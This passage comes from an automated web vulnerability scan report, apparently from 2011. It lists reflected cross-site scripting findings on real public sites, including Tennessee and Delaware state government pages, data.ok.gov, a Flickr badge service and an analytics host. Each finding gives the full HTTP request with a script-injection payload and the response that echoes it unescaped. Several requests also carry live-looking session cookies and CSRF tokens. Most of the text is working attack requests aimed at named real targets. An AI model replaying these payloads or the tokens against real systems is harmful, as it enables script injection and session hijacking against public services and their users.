GET /tennessee/default.cfm?e3bda"><script>alert(1)</script>1d3b780a45a=1 HTTP/1.1
Host: agency.governmentjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:19:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" x
...[SNIP]...
<form autocomplete="off" name="frmSort" action="http://agency.governmentjobs.com/tennessee/default.cfm?e3bda"><script>alert(1)</script>1d3b780a45a=1" method="post">
...[SNIP]...

3.3. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp [hdn_SessionId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC001.asp

Issue detail

The value of the hdn_SessionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87835"><script>alert(1)</script>8e73b9878c8 was submitted in the hdn_SessionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PGM/ASP/SC001.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
Origin: https://assist.dhss.delaware.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000
Content-Length: 388

hdn_ApplicationNum=&hdn_LoopNum=&hdn_SessionId=87835"><script>alert(1)</script>8e73b9878c8&hdn_PageId=SC001&hdn_DrSeqNum=&hdn_BussFunc=2&hdn_Frompage=&hdn_Language=EN&hdn_Context=&hdn_SuspendPage=&hdn_Program=MA&hdnReEntrant=Yes&hdn_IsSubmitted=1&hdn_GoBackClick=1&hdn_ButtonHitStatus=&hdn_
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:12:26 GMT; path=/
Date: Sat, 30 Apr 2011 00:40:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 11586
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:40:00 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html LANG="EN">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTENT
...[SNIP]...
<TD width='70%' align='left' valign='top'>87835"><script>alert(1)</script>8e73b9878c8&nbsp;</TD>
...[SNIP]...

3.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The value of the hdn_Language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 974ab"><script>alert(1)</script>62305ace645 was submitted in the hdn_Language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /PGM/ASP/SC020.asp?hdn_Language=EN974ab"><script>alert(1)</script>62305ace645&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:48 GMT; path=/
Date: Sat, 30 Apr 2011 00:38:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10740
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:38:22 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...
<input TYPE="Hidden" ID="hdn_Language" NAME="hdn_Language" VALUE="EN974ab"><script>alert(1)</script>62305ace645">
...[SNIP]...

3.5. http://badge.dopiaza.org/flickr/badge.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://badge.dopiaza.org
Path:   /flickr/badge.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 102af<script>alert(1)</script>b0ad6541571 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flickr/badge.php?user=58853148@N02;num=7;sort=date-posted-desc;style=flow-horizontal;callback=jsonp130412404/102af<script>alert(1)</script>b0ad65415719963 HTTP/1.1
Host: badge.dopiaza.org
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=0b45eb9ced5b28bbb124a002452a9432; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 2419

jsonp130412404/102af<script>alert(1)</script>b0ad65415719963({source: "Cache [1112]", badge: "<ul class=\"dopiaza-flickr-badge-content\"><li class=\"first\"><img src=\"http://farm6.static.flickr.com/5
...[SNIP]...

3.6. http://badge.dopiaza.org/flickr/badge.php [user parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://badge.dopiaza.org
Path:   /flickr/badge.php

Issue detail

The value of the user request parameter is copied into the HTML document as plain text between tags. The payload 4b142<script>alert(1)</script>131c1eb7f27 was submitted in the user parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flickr/badge.php?user=58853148@N02;num=7;sort=date-posted-desc;style=flow-horizontal;callback=jsonp13041240499634b142<script>alert(1)</script>131c1eb7f27 HTTP/1.1
Host: badge.dopiaza.org
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:38 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=0ea5122a4b70b6e39028022faf85e52d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 2418

jsonp13041240499634b142<script>alert(1)</script>131c1eb7f27({source: "Cache [1114]", badge: "<ul class=\"dopiaza-flickr-badge-content\"><li class=\"first\"><img src=\"http://farm6.static.flickr.com/51
...[SNIP]...

3.7. http://data.gosquared.com/info [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.gosquared.com
Path:   /info

Issue detail

The value of the a request parameter is copied into the HTML document as plain text between tags. The payload bb626<script>alert(1)</script>1ce2267e2f9 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info?a=GSN-237422-Wbb626<script>alert(1)</script>1ce2267e2f9&cs=UTF-8&cd=16&fl=10.2%20r154&je=1&la=en-us&sw=1920&sh=1200&dm=www.mo.gov&pa=%2F&pt=MO.gov%20%7C%20Official%20Website%20of%20the%20State%20of%20Missouri&pr=http%3A&pl=0&tl=5805&ri=0&ru=-&ui=1496610374&re=0&vi=1&pv=1&lv=0&un=PUBLIC_TRAFFIC HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:15:42 GMT
Expires: Tue, 05 Apr 2011 11:15:42
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 318

/* Error: line 36 in /var/www/shard/include/classes/GS_log.php
    [2] fopen(/var/log/gosquared/actions.log): failed to open stream: Permission denied */
/*** Error 402: We couldn't find any sites registered with account code or ID "GSN-237422-Wbb626<script>alert(1)</script>1ce2267e2f9"    Referring page: www.mo.gov/ ***/

3.8. http://data.ok.gov/api/rdfTerms.json [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/rdfTerms.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e754<script>alert(1)</script>62783531095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/rdfTerms.json3e754<script>alert(1)</script>62783531095?type=property HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:22:55 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/rdfTerms.json3e754<script>alert(1)</script>62783531095"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 137

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/rdfTerms.json3e754<script>alert(1)</script>62783531095\""
}

3.9. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7d8ba<script>alert(1)</script>8a84712b69d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views7d8ba<script>alert(1)</script>8a84712b69d/35sq-wrr4/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:39 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views7d8ba<script>alert(1)</script>8a84712b69d/35sq-wrr4/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views7d8ba<script>alert(1)</script>8a84712b69d/35sq-wrr4/snapshots/page\""
}

3.10. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 19f3f<script>alert(1)</script>661c8559ca5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/35sq-wrr419f3f<script>alert(1)</script>661c8559ca5/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:41 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/35sq-wrr419f3f<script>alert(1)</script>661c8559ca5/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/35sq-wrr419f3f<script>alert(1)</script>661c8559ca5/snapshots/page\""
}

3.11. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6046c<script>alert(1)</script>543e6f3b246 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/35sq-wrr4/snapshots6046c<script>alert(1)</script>543e6f3b246/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:42 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/35sq-wrr4/snapshots6046c<script>alert(1)</script>543e6f3b246/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/35sq-wrr4/snapshots6046c<script>alert(1)</script>543e6f3b246/page\""
}

3.12. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of the size request parameter is copied into the HTML document as plain text between tags. The payload 90e64<script>alert(1)</script>dd1f2b612b1 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/35sq-wrr4/snapshots/page?size=thumb90e64<script>alert(1)</script>dd1f2b612b1 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:38 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No snapshot at size thumb90e64<script>alert(1)</script>dd1f2b612b1
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 129

{
"code" : "not_found",
"error" : true,
"message" : "No snapshot at size thumb90e64<script>alert(1)</script>dd1f2b612b1"
}

3.13. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 405e8<script>alert(1)</script>445270b6eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views405e8<script>alert(1)</script>445270b6eac/dz4w-xbzm/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:40 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views405e8<script>alert(1)</script>445270b6eac/dz4w-xbzm/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views405e8<script>alert(1)</script>445270b6eac/dz4w-xbzm/snapshots/page\""
}

3.14. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6230f<script>alert(1)</script>406c1f55e10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/dz4w-xbzm6230f<script>alert(1)</script>406c1f55e10/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:41 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/dz4w-xbzm6230f<script>alert(1)</script>406c1f55e10/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/dz4w-xbzm6230f<script>alert(1)</script>406c1f55e10/snapshots/page\""
}

3.15. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72b93<script>alert(1)</script>091d192e286 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/dz4w-xbzm/snapshots72b93<script>alert(1)</script>091d192e286/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:42 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/dz4w-xbzm/snapshots72b93<script>alert(1)</script>091d192e286/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/dz4w-xbzm/snapshots72b93<script>alert(1)</script>091d192e286/page\""
}

3.16. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of the size request parameter is copied into the HTML document as plain text between tags. The payload d384b<script>alert(1)</script>90d3a2c8106 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/dz4w-xbzm/snapshots/page?size=thumbd384b<script>alert(1)</script>90d3a2c8106 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:38 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No snapshot at size thumbd384b<script>alert(1)</script>90d3a2c8106
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 129

{
"code" : "not_found",
"error" : true,
"message" : "No snapshot at size thumbd384b<script>alert(1)</script>90d3a2c8106"
}

3.17. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86e9c<script>alert(1)</script>bfeb2fe5933 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views86e9c<script>alert(1)</script>bfeb2fe5933/xxvf-kunf/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
